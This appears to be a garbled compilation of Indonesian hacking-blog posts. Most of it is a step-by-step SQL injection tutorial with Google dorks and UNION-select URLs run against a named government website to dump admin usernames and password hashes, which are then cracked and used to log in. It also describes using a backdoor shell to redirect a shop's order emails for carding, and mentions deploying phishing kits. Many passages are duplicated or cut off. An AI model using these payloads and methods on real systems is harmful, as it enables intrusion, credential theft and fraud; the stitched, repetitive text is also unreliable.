%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
Referrer URL:
Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1′ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
1
Nah klo udah jangan lupa decrypt passwordnya ya
5. Admin Shop Send Mail Order
Contoh:
Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.
Misal target:
http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php
Nah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:
var $dbtype = ‘mysql’;
var $host = ‘localhost’;
var $user = ‘shop24_admin’;
var $db = ‘shopsex_site’;
var $mailer = ‘mail’;
var $ordermailsendto = ‘ben@netboost.com.au‘;
Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”.
Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..
Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..
6. Phising & Scaming
Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner.
Nah gitu ajah dech dari gw, selamat berselancar dah..
Segala tindak tanduk jadi tanggung jawab loe sendiri..
Segala tindak tanduk jadi tanggung jawab loe sendiri..
Jadikanlah ilmu sebagai pembelajaran yang berharga dalam hidup!
Salam Site Is Down Cyber Figter
Persyaratan:
ponsel Android
4.0GB pada sdcard Anda.
Langkah Pertama :
kamu harus mendownload Linux Deploy di google play. Jika Anda sudah memilikinya pastikan untuk memperbaruinya karena opsi Kali linux agak baru.
Langkah kedua:
Buka aplikasi dan mencari panah dalam simbol kotak. Anda harus disajikan dengan halaman ini:
Langkah 3:
Anda perlu mengubah hanya 3 hal paling banyak. Pertama mengubah distribusi ke Kali linux . Kemudian gulir semua jalan ke bawah dan mengubah pengaturan VNC untuk mencocokkan telepon Anda .
Langkah 4 :
tekan install ... cukup mudah . Ini akan menghasilkan file img . Kemudian donwload semua paket yang dibutuhkan . Perkiraan waktu download 10-20 menit . Anda juga akan mendapatkan error atau berhasil akan menginstal . Anda mungkin ingin menjadi dekat dengan jaringan wifi Anda sehingga Anda tidak sengaja menjatuhkan dan harus memulai dari awal .
Langkah 5:
Tekan panah di tombol kotak lagi. TIDAK BERHENTI . Ini akan membawa Anda kembali ke halaman dengan pilihan kustomisasi . Yang harus Anda lakukan adalah tekan reconfigure dan menunggu sekitar 3 menit . Setelah itu telah baik diinstal dan dikonfigurasi ulang dengan tidak ada kesalahan ... Anda bisa memulai .
angkah 3:
Anda perlu mengubah hanya 3 hal paling banyak. Pertama mengubah distribusi ke Kali linux . Kemudian gulir semua jalan ke bawah dan mengubah pengaturan VNC untuk mencocokkan telepon Anda .
Langkah 4 :
tekan install ... cukup mudah . Ini akan menghasilkan file img . Kemudian donwload semua paket yang dibutuhkan . Perkiraan waktu download 10-20 menit . Anda juga akan mendapatkan error atau berhasil akan menginstal . Anda mungkin ingin menjadi dekat dengan jaringan wifi Anda sehingga Anda tidak sengaja menjatuhkan dan harus memulai dari awal .
Langkah 5:
Tekan panah di tombol kotak lagi. TIDAK BERHENTI . Ini akan membawa Anda kembali ke halaman dengan pilihan kustomisasi . Yang harus Anda lakukan adalah tekan reconfigure dan menunggu sekitar 3 menit . Setelah itu telah baik diinstal dan dikonfigurasi ulang dengan tidak ada kesalahan ... Anda bisa memulai .
angkah 3:
Anda perlu mengubah hanya 3 hal paling banyak. Pertama mengubah distribusi ke Kali linux . Kemudian gulir semua jalan ke bawah dan mengubah pengaturan VNC untuk mencocokkan telepon Anda .
Langkah 4 :
tekan install ... cukup mudah . Ini akan menghasilkan file img . Kemudian donwload semua paket yang dibutuhkan . Perkiraan waktu download 10-20 menit . Anda juga akan mendapatkan error atau berhasil akan menginstal . Anda mungkin ingin menjadi dekat dengan jaringan wifi Anda sehingga Anda tidak sengaja menjatuhkan dan harus memulai dari awal .
Langkah 5:
Tekan panah di tombol kotak lagi. TIDAK BERHENTI . Ini akan membawa Anda kembali ke halaman dengan pilihan kustomisasi . Yang harus Anda lakukan adalah tekan reconfigure dan menunggu sekitar 3 menit . Setelah itu telah baik diinstal dan dikonfigurasi ulang dengan tidak ada kesalahan ... Anda bisa memulai .
Langkah 7:
Klik pada tool bar di bagian bawah pojok kiri. Pilih aksesori dan membuka LXTerminal. Kemudian membawa keyboard dan ketik perintah berikut
sudo passwd
sekarang pilih password untuk diri sendiri. Ini akan digunakan untuk log in sebagai root dan ssh.
Saya sangat merekomendasikan bahwa Anda pergi ke depan dan menggunakan komputer untuk vnc beberapa hari pertama. Hanya karena menggunakan jari-jari Anda benar-benar memakan waktu.
Langkah 8: Have fun! Meskipun Anda harus menginstal semua alat Anda, Anda akan hampir tidak pernah mengalami kesalahan seperti yang Anda lakukan jika Anda mencoba dan menetap untuk menginstal pada android normal Anda.
Pengertian SQL Injection
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter :
id=$id;……. > Got Error
Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.
Contoh :
http://situstarget.com/news.php?id=1’
http://situstarget.com/news.php?id=’1
Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.
Dork SQLi :
Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.
http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error
Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.
Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.
Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--
Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.
Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
contoh :
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--
Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabeltbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--
Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--
Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :
user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya disini. Selanjutnya tinggal mencari halaman logginnya. kalo semua sudah ketemu, tinggal loggin aja.
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter :
id=$id;……. > Got Error
Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.
Contoh :
http://situstarget.com/news.php?id=1’
http://situstarget.com/news.php?id=’1
Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.
Dork SQLi :
inurl:azerty.php?id= ,Disini saya sudah menemukan targetnya : http://diklat.lampungprov.go.id/more.php?id=1
inurl:bouquin.php?id= ,
inurl:lien.php?id= ,
inurl:clavier.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.
http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error
Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.
Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.
Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--
Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.
Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
contoh :
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--
Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabeltbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--
Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--
Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :
user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya disini. Selanjutnya tinggal mencari halaman logginnya. kalo semua sudah ketemu, tinggal loggin aja.
Greeting Site Is Down Cyber Fighter Family,
Kali ini kita akan share sebuah tools yang berguna untuk melakukan testing keamanan terhadap situs yang berbasis wordpress. Dimana hasil dari scan bisa dilihat berupa report dan dikirimkan ke email.
Berikut penampakannya:
aWPVSCAN adalah Android WordPress Vulnerability Scanner yaitu aplikasi android ditulis dalam ruby dibuat untuk menemukan kelemahan yang terdapat dalam website yang berbasis WordPress. Dimaksudkan menggunakannya untuk untuk profesional keamanan atau administrator WordPress untuk menilai seberapa besar keamanan website WordPress mereka.
* Tested on Samsung Galaxy Nexus, Jelly Bean 4.1.2
* Tested on Samsung Galaxy Nexus, Jelly Bean 4.1.2
